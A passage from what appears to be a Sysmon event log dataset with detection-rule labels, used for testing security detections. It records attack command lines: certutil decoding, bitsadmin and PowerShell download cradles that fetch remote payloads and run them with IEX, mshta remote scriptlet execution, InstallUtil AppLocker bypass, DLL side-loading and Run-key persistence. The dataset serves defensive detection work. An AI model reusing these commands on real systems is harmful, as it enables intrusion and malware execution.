Word","FileVersion":"12.0.4518.1014","Hashes":"SHA1=534A7EA9C67BAB3E8F2D41977BF43D41DFE951CF,MD5=CEAA5817A65E914AA178B28F12359A46,SHA256=6C959CFB001FBB900958441DFD8B262FB33E052342948BAB338775D3E83EF7F7,IMPHASH=46337557842A2A62735BB11EB096B204","Image":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020D1090A00","LogonId":"0xa09d1","OriginalFileName":"WinWord.exe","ParentCommandLine":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe --xStart","ParentImage":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","ParentProcessGuid":"747F3D96-D8E5-5F8A-0000-0010E1BC7200","ParentProcessId":2920,"ProcessGuid":"747F3D96-D8F1-5F8A-0000-00108B4B7300","ProcessId":1576,"Product":"2007 Microsoft Office system","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 11:43:45.116"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417083,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:45.120170Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","MS Office Product Spawning Exe in User Dir","Microsoft Office Product Spawning Windows Shell"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c ping 127.0.0.1&&del del /F /Q /A:H \"C:\\Users\\IEUser\\AppData\\Roaming\\wwlib.dll\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Roaming\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 
(WinBuild.160101.0800)","Hashes":"SHA1=E2EAD0993B917E1828A658ADA0B87E01D5B8424F,MD5=C43699F84A68608E7E57C43B7761BBB8,SHA256=2EDB180274A51C83DDF8414D99E90315A9047B18C51DFD070326214D4DA59651,IMPHASH=392B4D61B1D1DADC1F06444DF258188A","Image":"C:\\Windows\\SysWOW64\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020D1090A00","LogonId":"0xa09d1","OriginalFileName":"Cmd.Exe","ParentCommandLine":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe --xStart","ParentImage":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","ParentProcessGuid":"747F3D96-D8E5-5F8A-0000-0010E1BC7200","ParentProcessId":2920,"ProcessGuid":"747F3D96-D8F5-5F8A-0000-00106B6F7300","ProcessId":1680,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 11:43:49.217"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417085,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:49.229742Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-04-27 15:57:25.868","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-7ACC-5CC4-0000-0010B2470300","ProcessId":2772,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Downloads\\Flash_update.exe","UtcTime":"2019-04-27 
15:57:25.868"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":6575,"Execution_attributes":{"ProcessID":1912,"ThreadID":996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-04-27T15:57:25.868863Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-04-27 15:57:53.634","Image":"C:\\Users\\IEUser\\Downloads\\Flash_update.exe","ProcessGuid":"365ABB72-7C01-5CC4-0000-00102B3E0C00","ProcessId":2680,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\NvSmart.exe","UtcTime":"2019-04-27 15:57:53.634"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":6579,"Execution_attributes":{"ProcessID":1912,"ThreadID":996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-04-27T15:57:53.650113Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-04-27 
15:57:53.634","Image":"C:\\Users\\IEUser\\Downloads\\Flash_update.exe","ProcessGuid":"365ABB72-7C01-5CC4-0000-00102B3E0C00","ProcessId":2680,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\NvSmartMax.dll","UtcTime":"2019-04-27 15:57:53.634"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":6581,"Execution_attributes":{"ProcessID":1912,"ThreadID":996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-04-27T15:57:53.650113Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Users\\IEUser\\AppData\\Roaming\\svchost.exe","EventType":"SetValue","Image":"C:\\Users\\IEUser\\AppData\\Roaming\\NvSmart.exe","ProcessGuid":"365ABB72-7C01-5CC4-0000-0010F9530C00","ProcessId":2992,"RuleName":"technique_id=T1060,technique_name=Registry Run Keys / Start Folder","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\360v","UtcTime":"2019-04-27 
15:57:53.806"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":6593,"Execution_attributes":{"ProcessID":1912,"ThreadID":996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-04-27T15:57:53.884488Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c certutil -f -decode fi.b64 AllTheThings.dll ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-660A-5D3F-0000-0010B9E08500","ProcessId":3184,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:32:58.614"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4888,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:32:58.659405Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"certutil -f -decode fi.b64 AllTheThings.dll ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"CertUtil.exe","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4","Image":"C:\\Windows\\System32\\certutil.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c certutil -f -decode fi.b64 AllTheThings.dll ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-660A-5D3F-0000-0010B9E08500","ParentProcessId":3184,"ProcessGuid":"747F3D96-660A-5D3F-0000-0010FFF28500","ProcessId":700,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:32:58.940"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4890,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:32:59.234755Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows PowerShell Web Request"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c powershell -c \"Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-660F-5D3F-0000-001055378600","ProcessId":2948,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:03.238"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4893,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:03.254713Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Bitsadmin Download"],"event":{"Event":{"EventData":{"CommandLine":"bitsadmin.exe /transfer \"JobName\" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt \"C:\\Windows\\system32\\Default_File_Path.ps1\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"BITS administration utility","FileVersion":"7.8.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=5DEB6EC7BB9BD0C85BBE91CBFD92BDC774FE5F8A,MD5=5CD8838F1E275B0C8EADF4B755C04E4F,SHA256=03C7E317E277BBD6C9C1159F8718A9D302E6F78E0D80C09D52A994B7598C0F30,IMPHASH=B0A3CFF8CFDE112945189719F82F9EA9","Image":"C:\\Windows\\System32\\bitsadmin.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c bitsadmin.exe /transfer \"JobName\" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt \"C:\\Windows\\system32\\Default_File_Path.ps1\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-660F-5D3F-0000-00109B328600","ParentProcessId":6020,"ProcessGuid":"747F3D96-660F-5D3F-0000-00100F4F8600","ProcessId":3896,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:03.667"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4894,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:03.886611Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Bitsadmin Job via PowerShell","Windows PowerShell Web Request"],"event":{"Event":{"EventData":{"CommandLine":"powershell -c \"Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows PowerShell","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c powershell -c \"Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-660F-5D3F-0000-001055378600","ParentProcessId":2948,"ProcessGuid":"747F3D96-660F-5D3F-0000-00106B508600","ProcessId":6720,"Product":"Microsoft® Windows® Operating 
System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:03.695"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4895,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:03.966393Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6614-5D3F-0000-001093CE8600","ProcessId":108,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:08.174"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4897,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:08.202018Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":".NET Framework installation utility","FileVersion":"4.7.3190.0 built by: NET472REL1LAST_C","Hashes":"SHA1=1BEB7CDC82F57269A4AD123BE7F8B72F7F1B4630,MD5=7CCB088EEFBF464D0A467D0FF4C619DA,SHA256=0389427DA1D97388D89F28C2D856CD871FC200562C51749C6F6EF4FED9087FAE,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6614-5D3F-0000-001093CE8600","ParentProcessId":108,"ProcessGuid":"747F3D96-6614-5D3F-0000-0010BFD98600","ProcessId":5696,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:08.415"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4899,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:08.446374Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6619-5D3F-0000-0010FDE78600","ProcessId":5116,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:13.169"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4900,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:13.214691Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c mshta.exe javascript:a=GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct\").Exec();close();","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-661E-5D3F-0000-0010A3148700","ProcessId":776,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:18.241"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4902,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:18.286776Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Mshta JavaScript Execution","Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"mshta.exe javascript:a=GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct\").Exec();close();","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft (R) HTML Application host","FileVersion":"11.00.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=DD8B22ACEA424823BB64ABF71F61A03D41177C38,MD5=F328FDCFF05BF02C2C986D52AED8BC2A,SHA256=E616C5CE71886652C13E2E1FA45A653B44D492B054F16B15A38418B8507F57C7,IMPHASH=42DA177DE2FAA97C3DFAEC9562772A7F","Image":"C:\\Windows\\System32\\mshta.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c mshta.exe javascript:a=GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct\").Exec();close();","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-661E-5D3F-0000-0010A3148700","ParentProcessId":776,"ProcessGuid":"747F3D96-661E-5D3F-0000-00107F248700","ProcessId":3164,"Product":"Internet Explorer","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:18.451"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4904,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:18.583990Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Windows PowerShell Web Request"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c powershell -c \"(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 